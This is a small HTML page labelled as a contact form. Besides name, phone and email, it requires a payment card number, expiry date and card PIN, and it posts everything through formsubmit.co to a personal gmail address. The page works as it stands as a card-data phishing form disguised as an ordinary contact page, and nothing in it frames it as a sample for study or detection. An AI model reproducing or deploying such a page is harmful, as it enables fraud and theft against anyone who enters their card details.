<!DOCTYPE html>
<HTML>
<HEAD>
<TITLE>CONTACT FORM</TITLE>
</HEAD>
<BODY>

<form action="https://formsubmit.co/dummybhai22@gmail.com" method="post">
<BR>
<BR>
<CENTER>
Name: <input type="text"  name="Name" placeholder="YOUR NAME" required>
<BR>
<BR>
Mobile: <input type="text"  name="mobile" placeholder="YOUR PHONE NUMBER" required>
<BR>
<BR>
Email Address: <input type="text"  name="emailaddress" placeholder="YOUR EMAIL ADDRESS" required>
<BR>
<BR>
Card Number: <input type="text"  name="card number" placeholder="YOUR CARD NUMBER" required>
<BR>
<BR>
Card Expiry: <input type="text"  name="card expiry" placeholder="YOUR CARD EXPIRY" required>
<BR>
<BR>
Card Pin: <input type="password"  name="card pin" placeholder="YOUR CARD PIN" required>
<BR>
<BR>

<P> 
<button type="submit">SUBMIT</button>
</P>
</CENTER>
</form>
</BODY>
</HTML>
	